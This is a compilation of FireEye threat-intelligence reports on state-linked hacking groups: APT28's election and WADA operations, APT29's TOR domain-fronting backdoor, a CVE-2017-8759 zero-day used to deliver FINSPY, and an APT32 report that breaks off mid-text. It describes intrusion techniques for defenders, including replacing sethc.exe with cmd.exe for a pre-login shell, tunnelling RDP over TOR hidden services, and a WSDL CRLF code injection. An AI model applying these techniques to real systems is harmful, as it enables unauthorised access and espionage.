In July, the DCCC announced that it was investigating an ongoing
cybersecurity incident
that
the FBI believed was linked to the compromise
of the DNC. House Speaker Nancy Pelosi
later confirmed that the DCCC had suffered a
network compromise. Investigators indicated
that the actors may have gained access to DCCC
systems as early as March.16,17,18
In August, the Guccifer 2.0 persona contacted reporters covering U.S. House of Representative races to announce newly
leaked documents from the DCCC pertaining to Democratic
candidates. From August to October, Guccifer 2.0 posted several additional installments of what appear to be internal DCCC
documents on
WordPress site.19,20
TV5Monde
FEBRUARY 2015,
APRIL 2015
In February, FireEye identified CORESHELL
traffic beaconing from TV5Monde
s network,
confirming that APT28 had compromised TV5Monde
s network.
In April 2015, alleged pro-ISIS hacktivist group CyberCaliphate
defaced TV5Monde
s websites and social media profiles and
forced the company
s 11 broadcast channels offline. FireEye
identified overlaps between the domain registration details of
CyberCaliphate
s website and APT28 infrastructure. 21
Ukrainian officials revealed that the investigation
into the compromise of the CEC
s internal network identified malware traced to APT28. 22
During the May 2014 Ukrainian presidential election, purported
pro-Russian hacktivists CyberBerkut conducted a series of malicious activities against the CEC including a system compromise,
data destruction, a data leak, a distributed denial-of-service
(DDoS) attack, and an attempted defacement of the CEC website with fake election results. 23
World Anti-Doping
Agency (WADA)
U.S. Democratic National
Committee (DNC)
John Podesta
Ukrainian Central
Election Commission
(CEC)
MAY 2014
WADA Confirms Attack by Russian Cyber Espionage Group.
World Anti-Doping Agency. 13 Sept. 2016. Web. 29 Dec. 2016.
Fancy Bears
HT (fancybears).
@AnonPress Greetings. We hacked #WADA. We have Proof of American Athletes taking doping. Fancybear.net.
12 Sept. 2016, 4:12 PM. Tweet.
CrowdStrike refers to activity corresponding to FireEye
s APT28 and APT29 as
Fancy Bear
and
Cozy Bear,
respectively.
Nakashima, Ellen.
Cyber Researchers Confirm Russian Government Hack of Democratic National Committee.
The Washington Post. 20 June 2016. Web. 29 Dec. 2016.
Rid, Thomas.
All Signs Point to Russia Being Behind the DNC Hack.
Motherboard, Vice. 25 July 2016. Web. 29 Dec. 2016.
Bennett, Cory.
Guccifer 2.0 Drops More DNC Docs.
Politico. 13 Sept. 2016. Web. 2 Jan. 2017. <>
Perlroth, Nicole. Shear, Michael D.
Private Security Group Says Russia was Behind John Podesta
s Email Hack.
The New York Times. 21 Oct. 2016. Web. 2 Jan. 2017.
Franceschi-Bicchierai, Lorenzo.
How Hackers Broke Into John Podesta and Colin Powell
s Gmail Accounts.
20 Oct. 2016. Web. 2 Jan. 2017.
Nakashima, Ellen.
FBI Probes Suspected Breach of Another Democratic Organization by Russian Hackers.
The Washington Post. 29 July 2016. Web. 29 Dec. 2016.
Pelosi, Nancy.
DCCC Cyber Breach.
13 August 2016. Email. U.S. House of Representatives. Washington, DC. Politico. Web. 29 Dec. 2016.
Lipton, Eric. Shane, Scott.
Democratic House Candidates Were Also Targets of Russian Hacking.
The New York Times. 13 Dec. 2016. Web. 29 Dec. 2016.
Ibid.
SPECIAL REPORT / APT28: AT THE CENTER OF THE STORM
FROM OLYMPIC SLIGHT TO DATA LEAK:
Investigating APT28 at the World Anti-Doping Agency
As news of the DNC breach spread, APT28 was preparing for another set
of operations: countering the condemnation that Russia was facing after
doping allegations and a threatened blanket ban of the Russian team
from the upcoming Rio Games. Russia, like many nations, has long viewed
success in the Olympic Games as a source of national prestige and soft
power on the world stage. The doping allegations and prospective ban
from the Games further ostracized Russia, and likely provided motivation
to actively counter the allegations by attempting to discredit anti-doping
agencies and policies. Our investigation of APT28
s compromise of
WADA
s network, and our observations of the surrounding events reveal
how Russia sought to counteract a damaging narrative and delegitimize
the institutions leveling criticism.
ALLEGATIONS OF RUSSIAN ATHLETES
WIDESPREAD DOPING
NOV (2015)
JULY 18
AUG 4
WADA declares the
Russian Anti-Doping
Agency (RUSADA) noncompliant. 24
WADA-commissioned
report documents
evidence of Russian
athletes
widespread
doping. 25
Russian athletes were
barred from competing
in the Olympic Games. 26
APT28 COMPROMISES WADA
EARLY AUG
AUG 10
AUG 25-SEP 12
APT28 sends spear
phishing emails to
WADA employees. 27
APT28 uses a legitimate
user account belonging
to a Russian athlete to
log into WADA
s AntiDoping Administration
and Management
System (ADAMS)
database. 28
APT28 gains access
to an International
Olympic Committee
account created
specifically for the 2016
Olympic Games, and
views and downloads
athlete data. 29
SPECIAL REPORT / APT28: AT THE CENTER OF THE STORM
FALSE HACKTIVIST PERSONAS CLAIM TO TARGET WADA, LEAK ATHLETE DATA
AUG 9
AUG 11
SEP 12
SEP 13
SEP 15-30
The actor
@anpoland,
purporting to
represent
Anonymous Poland,
claims to have
defaced the
WADA website. 30
On August 11
@anpoland threatens
to conduct a DDoS
attack against and
leak data from WADA,
but fails to follow
through on the
threats. 31,32
Fancy Bears
Hack
Team
, a previously
unknown group
purporting to
be affiliated with
Anonymous, claims
via Twitter to have
compromised WADA,
and directs readers
to a website hosting
stolen documents. 33
WADA releases a
statement confirming
the breach and
attributes the
compromise and
theft of athlete
medical data
to APT28. 35
Fancy Bears
Hack
Team
releases five
additional batches
of medical files for
high-profile athletes
from multiple nations,
including the U.S.,
which had applied
for and received
Therapeutic Use
Exemptions (TUEs)
for medications
otherwise banned
from competition. 36
In tweets to
international
journalists and
Twitter accounts
that disseminate
hacktivist and
information security
news,
Fancy Bears
Hack Team
claims
to have
proof of
American athletes
taking doping.
Based on this timeline of leak and threatened leak
activity, as well as strikingly similar characteristics and
distribution methods shared between @anpoland and
Fancy Bears
Hack Team,
the same operators are highly
likely behind the two personas. WADA officials, citing
evidence provided by law enforcement, stated that the
threat activity originated in Russia, possibly in retaliation
Claiming to support
fair play and clean
sport,
Fancy Bears
Hack team calls TUEs
licenses for doping.
for WADA
s exposure of Russia
s expansive, state-run
doping. 38 The statement prompted denials from the
Russian Government, with Russian sports minister
Vitaly Mutko asking,
How can you prove that the
hackers are Russian? You blame Russia for everything,
it is very in fashion now.
20. Gallagher, Sean.
Guccifer 2.0 Posts DCCC Docs, Says They
re From Clinton Foundation.
Ars Technica. 4 Oct. 2016. Web. 3 Jan. 2017.
21.
Russian Hackers Suspected in French TV Cyberattack.
Deutsche Welle. 6 Oct. 2015. Web. 29 Dec. 2016.
22. Joselow, Gabe.
Election Cyberattacks: Pro-Russia Hackers Have Been Accused in Past.
NBC News. 3 Nov. 2016. Web. 29 Dec. 2016.
23. Clayton, Mark.
Ukraine Election Narrowly Avoided
Wanton Destruction
From Hackers (+Video).
The Christian Science Monitor. 17 June 2014. Web. 2 Jan. 2017.
24.
Foundation Board Media Release: WADA Strengthens Anti-Doping Worldwide.
World Anti-Doping Agency. 18 November 2015.
25.
Russia State-Sponsored Doping Across Majority of Olympic Sports, Claims Report.
The BBC. 18 July 2016. Web. 29 Dec. 2016.
26. Macguire, Eoghan. Almasy, Steve.
271 Russian Athletes Cleared for Rio Games.
CNN. 5 August 2016. Web. 29 Dec. 2016.
27.
Cyber Security Update: WADA
s Incident Response.
World Anti-Doping Agency. 5 Oct. 2016. Web. 3 Jan. 2017.
28.
WADA Confirms Attack by Russian Cyber Espionage Group.
World Anti-Doping Agency. 13 Sept. 2016.
29.
WADA Confirms Another Batch of Athlete Data Leaked by Russian Cyber Hackers
Fancy Bear.
World Anti-Doping Agency. 14 Sept. 2016. Web. 29 Dec. 2016. <>
30. [OP PL].
www.tas-cas.org.
Online video clip. YouTube. YouTube, 9 Aug. 2016. Web. 3 Jan. 2017.
31. Anonymous Poland (@anpoland).
@Cryptomeorg @ben_rumsby @PogoWasRight @Jason_A_Murdock @Cyber_War_News @kevincollier Tomorrow will ddos WADA and publish some secret dosc.
11 Aug 2016 10:10
AM. Tweet.
32. Anonymous Poland (@anpoland).
@JoeUchill within a few days will be new attack on the WADA/Olimpic.
5 Sept. 2016 5:19 AM. Tweet.
33. Fancy Bears
HT (fancybears).
@AnonPress Greetings. We hacked #WADA. We have Proof of American Athletes taking doping. Fancybear.net.
34. Ibid.
35.
WADA Confirms Attack by Russian Cyber Espionage Group.
World Anti-Doping Agency.13 Sept. 2016.
36. Russian Hackers Leak Simone Biles and Serena Williams Files.
The BBC. 13 Sept. 2016. Web. 29 Dec. 2016.
37. Rumsby, Ben.
US Superstars Serena and Venus Williams and Simone Biles Given Drugs Exemption, Russian Hackers Reveal.
The Telegraph. 14 Sept. 2016. Web. 29 Dec. 2016.
38. Luhn, Alec.
Fancy Bears Origins Unclear But Russia Seizes Chance to Put Boot into Wada.
15 Sept. 2016. Web. 29 Dec. 2016.
39. Gibson, Owen.
Russian Sports Minister Vitaly Mutko Denies Link to Wada Hackers.
The Guardian. 14 Sept. 2016. Web. 29 Dec. 2016.
SPECIAL REPORT / APT28: AT THE CENTER OF THE STORM
CONCLUSION
Since releasing our 2014 report, we continue to assess that
APT28 is sponsored by the Russian Government. We further
assess that APT28 is the group responsible for the network
compromises of WADA and the DNC and other entities
related to the 2016 U.S. presidential election cycle. These
breaches involved the theft of internal data - mostly emails
that was later strategically leaked through multiple forums
and propagated in a calculated manner almost certainly
intended to advance particular Russian Government aims. In
a report released on January 7 2017, the U.S. Directorate of
National Intelligence described this activity as an
influence
campaign.
This influence campaign - a combination of network
compromises and subsequent data leaks - aligns closely
with the Russian military
s publicly stated intentions and
capabilities. Influence operations, also frequently called
information operations,
have a long history of inclusion
in Russian strategic doctrine, and have been intentionally
developed, deployed, and modernized with the advent of
the internet. The recent activity in the U.S. is but one of
many instances of Russian Government influence operations
conducted in support of strategic political objectives, and it
will not be the last. As the 2017 elections in Europe approach
- most notably in Germany, France, and the Netherlands - we
are already seeing the makings of similarly concerted efforts.
SPECIAL REPORT / APT28: AT THE CENTER OF THE STORM
APPENDIX:
APT28
s Tools, Tactics, and Operational Changes
In our 2014 report, we identified APT28 as a suspected Russian
government-sponsored espionage actor. We came to this conclusion
in part based on forensic details left in the malware that APT28 had
employed since at least 2007. We have provided an updated version of
those conclusions, a layout of the tactics that they generally employ,
as well as observations of apparent tactical shifts. For full details,
please reference our 2014 report, APT28: A Window into Russia
s Cyber
Espionage Operations?
APT28 employs a suite of malware with features indicative of the group
plans for continued operations, as well as the group
s access to resources
and skilled developers.
Key characteristics of APT28
s toolset include:
A flexible, modular framework that has allowed APT28
to consistently evolve its toolset since at least 2007.
Use of a formal coding environment in which to develop
tools, allowing the group to create and deploy custom
modules within its backdoors.
Incorporation of counter-analysis capabilities including
runtime checks to identify an analysis environment, obfuscated
strings unpacked at runtime, and the inclusion of unused
machine instructions to slow analysis.
Code compiled during the normal working day in the Moscow
time zone and within a Russian language build environment.
OVER
APT28
S MALWARE
SAMPLES WERE
COMPILED DURING
THE WORKING WEEK
SAMPLES COMPILED
BETWEEN 8AM AND 6PM
IN THE TIMEZONE THAT
INCLUDES MAJOR RUSSIAN
CITIES SUCH AS MOSCOW
AND ST. PETERSBURG
IN ADDITION,
APT28
S DEVELOPERS
CONSISTENTLY BUILT
MALWARE IN RUSSIAN
LANGUAGE SETTINGS UNTIL
2013
SPECIAL REPORT / APT28: AT THE CENTER OF THE STORM
APT28
S MALWARE SUITE
TOOL
ROLE
CHOPSTICK
backdoor
Xagent, webhp, SPLM, (.v2 fysbis)
EVILTOSS
backdoor
Sedreco, AZZY, Xagent, ADVSTORESHELL, NETUI
GAMEFISH
backdoor
Sednit, Seduploader, JHUHUGIT, Sofacy
SOURFACE
downloader
Older version of CORESHELL, Sofacy
OLDBAIT
credential
harvester
Sasfis
CORESHELL
downloader
Newer version of SOURFACE, Sofacy
APT28
S OPERATIONAL CHANGES SINCE 2014
APT28 continues to evolve its toolkit and refine its tactics
in what is almost certainly an effort to protect its operational
effectiveness in the face of heightened public exposure and
scrutiny. In addition to the continued evolution of the group
first stage tools, we have also noted APT28:
Leveraging zero-day vulnerabilities in Adobe Flash Player,
Java, and Windows, including CVE-2015-1701, CVE-2015-2424,
CVE-2015-2590, CVE-2015-3043, CVE-2015-5119, and CVE2015-7645.
Using a profiling script to deploy zero-days and other
tools more selectively, decreasing the chance that researchers
and others will gain access to the group
s tools.
Increasing reliance on public code depositories, such
as Carberp, PowerShell Empire, P.A.S. webshell, Metasploit
modules, and others in a likely effort to accelerate their
development cycle and provide plausible deniability.
Obtaining credentials through fabricated Google
App authorization and Oauth access requests that allow
the group to bypass two-factor authentication and other
security measures.
Moving laterally through a network relying only
on legitimate tools that already exist within the victims
systems, at times forgoing their traditional toolset for the
duration of the compromise.
These changes are not only indicative of APT28
s skills,
resourcefulness, and desire to maintain operational
effectiveness, but also highlight the longevity of the
group
s mission and its intent to continue its activities
for the foreseeable future.
SPECIAL REPORT / APT28: AT THE CENTER OF THE STORM
APT28 TACTICS
We have observed APT28 rely on four key tactics when attempting
to compromise intended targets. These include sending spear-phishing
emails that either deliver exploit documents that deploy malware onto
a user
s systems, or contain a malicious URL designed to harvest the
recipients
email credentials and provide access to the their accounts.
APT28 has also compromised and placed malware on legitimate websites
intending to infect site visitors, and has gained access to organizations by
compromising their web-facing servers
TAC TI C
TAC TI C
INFECTION WITH MALWARE VIA SPEAR PHISH
WEBMAIL ACCESS VIA SPEAR-PHISH
Craft exploit document
with enticing lure content.
Register a domain spoofing a webmail service
or an organization
s webmail portal
(e.g., 0nedrive-0ffice365[.]com)
Register a domain spoofing
that of a legitimate
organization (e.g.,
theguardiannews[.]org).
Send exploit document
to victim.
Send link mirroring structure
of legitimate organization
site that is designed to
expire once users clickit.
Victim opens document,
and malware is installed by
exploiting a vulnerability
Victim goes to link and
retrieves malicious
document or is served a
web-based exploit that
installs malware.
(e.g., ARM-NATO_
ENGLISH_30_NOV_2016.
doc leveraged an Adobe Flash
exploit, CVE-2016-7855,
to install GAMEFISH
targeted machine).
(Flash Vulnerability CVE2016-7855 and Windows
Vulnerability CVE-2016-7255
were exploited as zero days to
install malware on victims who
visited a malicious URL).
Send email to targets
instructing them
to reset their passwords.
Send email to victims
warning of security risk
and asking them to enable
security service.
Recipient visits fake login page
and enters credentials.
Person is asked to authorize
application to view mail
and gives access.
APT28 uses stolen
credentials to access
mailbox and read email.
APT28 leverages OAuth
privileges given to malicious
application to read email.
APT28 IS IN YOUR NETWORK.
SPECIAL REPORT / APT28: AT THE CENTER OF THE STORM
TAC TI C
TAC TI C
INFECTION WITH MALWARE VIA STRATEGIC
WEB COMPROMISE (SWC)
ACCESS THROUGH INTERNET-FACING SERVERS
Compromise a legitimate site and set up
malicious iFrame.
Network reconnaissance to find vulnerable software.
Users of the site are redirected using malicious
iFrame and profiled
Exploitation of previously known vulnerabilities
present on unpatched systems.
(e.g, this technique was used
to compromise and infect visitors to numerous
Polish Government websites in 2014).
Exploit is served to users matching the target profile
and malware is installed on their system.
Leverage initial compromise to access other systems
and move deeper into the victim network.
APT28 IS IN YOUR NETWORK.
APT28 IS IN YOUR NETWORK.
SPECIAL REPORT / APT28: AT THE CENTER OF THE STORM
To download this or other
FireEye iSIGHT Intelligence reports,
visit: www.fireeye.com/reports.html
FireEye, Inc.
1440 McCarthy Blvd. Milpitas, CA 95035
408.321.6300 / 877.FIREEYE (347.3393) / info@FireEye.com
www.FireEye.com
2016 FireEye, Inc. All rights reserved. FireEye is a registered trademark of FireEye, Inc.
All other brands, products, or service names are or may be trademarks
or service marks of their respective owners. GRAF-60.
APT29 Domain Fronting With TOR
fireeye.com /blog/threat-research/2017/03/apt29_domain_frontin.html
Mandiant has observed Russian nation-state attackers APT29 employing domain fronting techniques for stealthy
backdoor access to victim environments for at least two years. There has been considerable discussion about
domain fronting following the release of a paper detailing these techniques. Domain fronting provides outbound
network connections that are indistinguishable from legitimate requests for popular websites.
APT29 has used The Onion Router (TOR) and the TOR domain fronting plugin meek to create a hidden, encrypted
network tunnel that appeared to connect to Google services over TLS. This tunnel provided the attacker remote
access to the host system using the Terminal Services (TS), NetBIOS, and Server Message Block (SMB) services,
while appearing to be traffic to legitimate websites. The attackers also leveraged a common Windows exploit to
access a privileged command shell without authenticating.
We first discussed APT29
s use of these techniques as part of our
No Easy Breach
talk at DerbyCon 6.0. For
additional details on how we first identified this backdoor, and the epic investigation it was part of, see the slides and
presentation.
Domain Fronting Overview
The Onion Router (TOR) is a network of proxy nodes that attempts to provide anonymity to users accessing the
Internet. TOR transfers internet traffic through a series of proxy points on the Internet, with each node knowing only
the previous and next node in the path. This proxy network, combined with pervasive encryption, makes tracking the
source of TOR Internet activity extremely difficult. A TOR client can also use the TOR network to host services that
are not accessible from the open Internet. These services are commonly used to host
dark web
sites such as the
defunct Silk Road.
Typically network analysts can identify normal TOR traffic through signature analysis or the identification of
communication with TOR infrastructure. Meek is a publicly available obfuscation plugin for TOR and an
implementation of the domain fronting technique. To hide TOR traffic, meek takes advantage of the way that Google
and other Internet content delivery networks (CDNs) route traffic. CDNs often route traffic from IP addresses
associated with one service to servers associated with another service hosted on the same network. By hosting a
meek reflection server in one of these CDNs, meek can hide TOR traffic in legitimate HTTPS connections to wellknown services.
Meek obfuscates traffic in several stages. First, it encodes TOR traffic into HTTP specifying the host name of the
reflection server (for example, the default server meek-reflect.appspot.com). It then wraps that HTTP traffic in a
legitimate TLS connection to a server hosted in the same CDN cloud as the reflection server (in this example,
Google). When the CDN server receives the connection, it decrypts the TLS traffic, identifies the hostname specified
in the HTTP header and redirects the traffic to the reflection server. The reflection server then reconstructs the
original TOR traffic from the HTTP stream and sends the traffic to the TOR network, which routes it to its destination.
This process creates an outbound network connection that appears to contain normal HTTPS POST requests for
google.com on a Google-owned IP address, while discretely passing the traffic through the reflection server to the
TOR network. Meek can also use the TLS service and cipher suites used by Firefox to further obfuscate traffic.
Differentiating this traffic from legitimate connections is extremely difficult, and encryption of both on the initial TLS
connection and the TOR traffic makes meaningful analysis of the traffic impossible. Note: Google suspended the
reflection server meek-reflect.appspot.com, but other servers, in the Google cloud or other supported CDNs, can
fulfill the same function.
Figure 1 displays the traffic flow when using meek.
Figure 1: Meek traffic flow
Backdoor Overview
Mandiant discovered that APT29 enabled a TOR hidden service that forwarded traffic from the TOR client to local
ports 139, 445 and 3389 (NetBIOS, SMB and TS, respectively). This provided the attackers full remote access to the
system from outside of the local network using the hidden TOR (.onion) address of the system.
The attackers created the following files and directories during the installation and execution of the backdoor:
C:\Program Files(x86)\Google\googleService.exe
C:\Program Files(x86)\Google\GoogleUpdate.exe
C:\Program Files(x86)\Google\core
C:\Program Files(x86)\Google\data
C:\Program Files(x86)\Google\data\00
C:\Program Files(x86)\Google\data\00\hostname
C:\Program Files(x86)\Google\data\00\private_key
C:\Program Files(x86)\Google\debug.log
C:\Program Files(x86)\Google\lock
C:\Program Files(x86)\Google\cached-certs
C:\Program Files(x86)\Google\cached-microdescs
C:\Program Files(x86)\Google\cached-microdescs.new
C:\Program Files(x86)\Google\cached-microdescs-consensus
C:\Program Files(x86)\Google\state
C:\Program Files(x86)\Google\start.ps1
C:\Program Files(x86)\Google\install.bat
The file googleService.exe is the primary TOR executable, responsible for establishing and maintaining encrypted
proxy connections. GoogleUpdate.exe is the meek-client plugin, which obfuscates the TOR connection. These files
are publicly available and have the following hashes:
Filename
SHA256
googleService.exe
GoogleUpdate.exe
fe744a5b2d07de396a8b3fe97155fc64e350b76d88db36c619cd941279987dc5
2f39dee2ee608e39917cc022d9aae399959e967a2dd70d83b81785a98bd9ed36
The file C:\Program Files (x86)\Google\core contains configuration information for the TOR service
googleService.exe. The service was configured to:
Communicate on ports 1, 80 and 443
Bridge traffic using the meek plugin to https://meek-reflect.appspot.com and obfuscate HTTPS and DNS
requests to appear destined for www.google.com
Forward traffic from ports 62304, 62305 and 62306 to ports 3389, 139 and 445, respectively
Figure 2 displays the contents of the TOR configuration file core.
Figure 2: Contents of TOR configuration file
C:\Program Files(x86)\Google\core
The C:\Program Files (x86)\Google\data\00\hostname
file contained a single line with the TOR hostname for the
system. This hostname was a pseudorandomly-generated 16 character alpha-numeric name, with the top-level
domain (TLD) .onion.
The C:\Program Files(x86)\Google\data\00\private_key file contained the TOR client RSA private key. Figure 3
displays the redacted contents of a sample private_key file.
Figure 3: Redacted contents of sample private_key
The attackers used the scripts start.ps1 and install.bat to install the TOR service. After installation, the attackers
deleted these scripts from the system. Additional files in the directory C:\Program Files(x86)\Google contained
cached data and logs from the operation of TOR.
Additional information on increasing visibility into PowerShell activity through enhanced logging is available here.
Installation and Persistence
The attacker executed the PowerShell script C:\Program Files(x86)\Google\start.ps1 to install the TOR services and
implement the
Sticky Keys
exploit. This script was deleted after execution, and was not recovered.
By replacing the
Sticky Keys
binary, C:\Windows\System32\sethc.exe, with the Windows Command Processor
cmd.exe, the attackers then accessed a privileged Windows console session without authenticating to the system.
Sticky Keys
is an accessibility feature that allows users to activate Windows modifier keys without pressing more
than one key at a time. Pressing the shift key five times activates
Sticky Keys
and executes sethc.exe, which,
when replaced with cmd.exe, opens a System-level command shell. From this shell, the attackers can execute
arbitrary Windows commands, including adding or modifying accounts on the system, even from the logon screen
(pre-authentication). By tunneling RDP traffic to the system, the attackers could gain both persistent access and
privilege escalation using this simple and well-known exploit.
The installation script start.ps1 created a Windows service named Google Update to maintain persistence after a
system reboot. Table 1 contains registry details for the
Google Update
service.
Table 1: Registry details for the TOR Google Update Windows service
The script also modified the Terminal Server registry values fSingleSessionPerUser to allow multiple simultaneous
Windows sessions using the same account, and fDenyTSConnections to allow Terminal Services connections. Table
2 shows the modified values for these registry keys.
Table 2: Registry modifications performed by start.ps1
Conclusion
APT29 adopted domain fronting long before these techniques were widely known. By employing a publicly available
implementation, they were able to hide their network traffic, with minimal research or development, and with tools
that are difficult to attribute. Detecting this activity on the network requires visibility into TLS connections and
effective network signatures. However, when dealing with advanced threat groups who rapidly develop capabilities
and invest in hiding network traffic, effective endpoint visibility is vital. Monitoring for potentially interesting events
and attacker methodologies, like lateral movement and new persistence creation, can allow defenders to identify
these stealthy methodologies.
FireEye Uncovers CVE-2017-8759: Zero-Day Used in the
Wild to Distribute FINSPY
fireeye.com /blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html
FireEye recently detected a malicious Microsoft Office RTF document that leveraged CVE-2017-8759, a SOAP
WSDL parser code injection vulnerability. This vulnerability allows a malicious actor to inject arbitrary code during
the parsing of SOAP WSDL definition contents. FireEye analyzed a Microsoft Word document where attackers used
the arbitrary code injection to download and execute a Visual Basic script that contained PowerShell commands.
FireEye shared the details of the vulnerability with Microsoft and has been coordinating public disclosure timed with
the release of a patch to address the vulnerability and security guidance, which can be found here.
FireEye email, endpoint and network products detected the malicious documents.
Vulnerability Used to Target Russian Speakers
The malicious document,
.doc
(MD5: fe5c4d6bb78e170abf5cf3741868ea4c), might have been used to
target a Russian speaker. Upon successful exploitation of CVE-2017-8759, the document downloads multiple
components (details follow), and eventually launches a FINSPY payload (MD5:
a7b990d5f57b244dd17e9a937a41e7f5).
FINSPY malware, also reported as FinFisher or WingBird, is available for purchase as part of a
lawful intercept
capability. Based on this and previous use of FINSPY, we assess with moderate confidence that this malicious
document was used by a nation-state to target a Russian-speaking entity for cyber espionage purposes. Additional
detections by FireEye
s Dynamic Threat Intelligence system indicates that related activity, though potentially for a
different client, might have occurred as early as July 2017.
CVE-2017-8759 WSDL Parser Code Injection
A code injection vulnerability exists in the WSDL parser module within the PrintClientProxy method
(http://referencesource.microsoft.com/ - System.Runtime.Remoting/metadata/wsdlparser.cs,6111). The IsValidUrl
does not perform correct validation if provided data that contains a CRLF sequence. This allows an attacker to inject
and execute arbitrary code. A portion of the vulnerable code is shown in Figure 1.
Figure 1: Vulnerable WSDL Parser
When multiple address definitions are provided in a SOAP response, the code inserts the
//base.ConfigureProxy(this.GetType(),
string after the first address, commenting out the remaining addresses.
However, if a CRLF sequence is in the additional addresses, the code following the CRLF will not be commented
out. Figure 2 shows that due to lack validation of CRLF, a System.Diagnostics.Process.Start method call is injected.
The generated code will be compiled by csc.exe of .NET framework, and loaded by the Office executables as a
DLL.
Figure 2: SOAP definition VS Generated code
The In-the-Wild Attacks
The attacks that FireEye observed in the wild leveraged a Rich Text Format (RTF) document, similar to the CVE2017-0199 documents we previously reported on. The malicious sampled contained an embedded SOAP monikers
to facilitate exploitation (Figure 3).
Figure 3: SOAP Moniker
The payload retrieves the malicious SOAP WSDL definition from an attacker-controlled server. The WSDL parser,
implemented in System.Runtime.Remoting.ni.dll of .NET framework, parses the content and generates a .cs source
code at the working directory. The csc.exe of .NET framework then compiles the generated source code into a
library, namely http[url path].dll. Microsoft Office then loads the library, completing the exploitation stage. Figure 4
shows an example library loaded as a result of exploitation.
Figure 4: DLL loaded
Upon successful exploitation, the injected code creates a new process and leverages mshta.exe to retrieve a HTA
script named
word.db
from the same server. The HTA script removes the source code, compiled DLL and the PDB
files from disk and then downloads and executes the FINSPY malware named
left.jpg,
which in spite of the .jpg
extension and
image/jpeg
content-type, is actually an executable. Figure 5 shows the details of the PCAP of this
malware transfer.
Figure 5: Live requests
The malware will be placed at %appdata%\Microsoft\Windows\OfficeUpdte-KB[ 6 random numbers ].exe. Figure 6
shows the process create chain under Process Monitor.
Figure 6: Process Created Chain
The Malware
The
left.jpg
(md5: a7b990d5f57b244dd17e9a937a41e7f5) is a variant of FINSPY. It leverages heavily obfuscated
code that employs a built-in virtual machine
among other anti-analysis techniques
to make reversing more
difficult. As likely another unique anti-analysis technique, it parses its own full path and searches for the string
representation of its own MD5 hash. Many resources, such as analysis tools and sandboxes, rename files/samples
to their MD5 hash in order to ensure unique filenames. This variant runs with a mutex of "WininetStartupMutex0".
Conclusion
CVE-2017-8759 is the second zero-day vulnerability used to distribute FINSPY uncovered by FireEye in 2017.
These exposures demonstrate the significant resources available to
lawful intercept
companies and their
customers. Furthermore, FINSPY has been sold to multiple clients, suggesting the vulnerability was being used
against other targets.
It is possible that CVE-2017-8759 was being used by additional actors. While we have not found evidence of this,
the zero day being used to distribute FINSPY in April 2017, CVE-2017-0199 was simultaneously being used by a
financially motivated actor. If the actors behind FINSPY obtained this vulnerability from the same source used
previously, it is possible that source sold it to additional actors.
Acknowledgement
Thank you to Dhanesh Kizhakkinan, Joseph Reyes, FireEye Labs Team, FireEye FLARE Team and FireEye iSIGHT
Intelligence for their contributions to this blog. We also thank everyone from the Microsoft Security Response Center
(MSRC) who worked with us on this issue.
Cyber Espionage is Alive and Well: APT32 and the Threat to
Global Corporations
fireeye.com /blog/threat-research/2017/05/cyber-espionage-apt32.html
Cyber espionage actors, now designated by FireEye as APT32 (OceanLotus Group), are carrying out intrusions into
private sector companies across multiple industries and have also targeted foreign governments, dissidents, and
journalists. FireEye assesses that APT32 leverages a unique suite of fully-featured malware, in conjunction with
commercially-available tools, to conduct targeted operations that are aligned with Vietnamese state interests.
APT32 and FireEye
s Community Response
In the course of investigations into intrusions at several corporations with business interests in Vietnam, FireEye
Mandiant incident response consultants uncovered activity and attacker-controlled infrastructure indicative of a
significant intrusion campaign. In March 2017, in response to active targeting of FireEye clients, the team launched
a Community Protection Event (CPE)
a coordinated effort between Mandiant incident responders, FireEye as a
Service (FaaS), FireEye iSight Intelligence, and FireEye product engineering
to protect all clients from APT32
activity.
In the following weeks, FireEye released threat intelligence products and updated malware profiles to customers
while developing new detection techniques for APT32
s tools and phishing lures. This focused intelligence and
detection effort led to new external victim identifications as well as providing sufficient technical evidence to link
twelve prior intrusions, consolidating four previously unrelated clusters of threat actor activity into FireEye
s newest
named advanced persistent threat group: APT32.
APT32 Targeting of Private Sector Company Operations in Southeast Asia
Since at least 2014, FireEye has observed APT32 targeting foreign corporations with a vested interest in Vietnam
manufacturing, consumer products, and hospitality sectors. Furthermore, there are indications that APT32 actors
are targeting peripheral network security and technology infrastructure corporations, as well as consulting firms that
may have connections with foreign investors.
Here is an overview of intrusions investigated by FireEye that are attributed to APT32:
In 2014, a European corporation was compromised prior to constructing a manufacturing facility in Vietnam.
In 2016, Vietnamese and foreign-owned corporations working in network security, technology infrastructure,
banking, and media industries were targeted.
In mid-2016, malware that FireEye believes to be unique to APT32 was detected on the networks of a global
hospitality industry developer with plans to expand operations into Vietnam.
From 2016 through 2017, two subsidiaries of U.S. and Philippine consumer products corporations, located
inside Vietnam, were the target of APT32 intrusion operations.
In 2017, APT32 compromised the Vietnamese offices of a global consulting firm.
Table 1 shows a breakdown of APT32 activity, including the malware families used in each.
Year
Country
Industry
Malware
1/11
2014
Vietnam
Network Security
WINDSHIELD
2014
Germany
Manufacturing
WINDSHIELD
2015
Vietnam
Media
WINDSHIELD
2016
Philippines
Consumer products
KOMPROGO
WINDSHIELD
SOUNDBITE
BEACON
2016
Vietnam
Banking
WINDSHIELD
2016
Philippines
Technology Infrastructure
WINDSHIELD
2016
China
Hospitality
WINDSHIELD
2016
Vietnam
Media
WINDSHIELD
2016
United States
Consumer Products
WINDSHIELD
PHOREAL
BEACON
SOUNDBITE
2017
United Kingdom
Consulting
SOUNDBITE
Table 1: APT32 Private Sector Targeting Identified by FireEye
APT32 Interest in Political Influence and Foreign Governments
In addition to focused targeting of the private sector with ties to Vietnam, APT32 has also targeted foreign
governments, as well as Vietnamese dissidents and journalists since at least 2013. Here is an overview of this
activity:
A public blog published by the Electronic Frontier Foundation indicated that journalists, activists, dissidents,
and bloggers were targeted in 2013 by malware and tactics consistent with APT32 operations.
In 2014, APT32 leveraged a spear-phishing attachment titled
Plans to crackdown on protesters at the
Embassy of Vietnam.exe," which targeted dissident activity among the Vietnamese diaspora in Southeast
Asia. Also in 2014, APT32 carried out an intrusion against a Western country
s national legislature.
In 2015, SkyEye Labs, the security research division of the Chinese firm Qihoo 360, released a report
detailing threat actors that were targeting Chinese public and private entities including government agencies,
research institutes, maritime agencies, sea construction, and shipping enterprises. The information included
in the report indicated that the perpetrators used the same malware, overlapping infrastructure, and similar
targets as APT32.
In 2015 and 2016, two Vietnamese media outlets were targeted with malware that FireEye assesses to be
unique to APT32.
In 2017, social engineering content in lures used by the actor provided evidence that they were likely used to
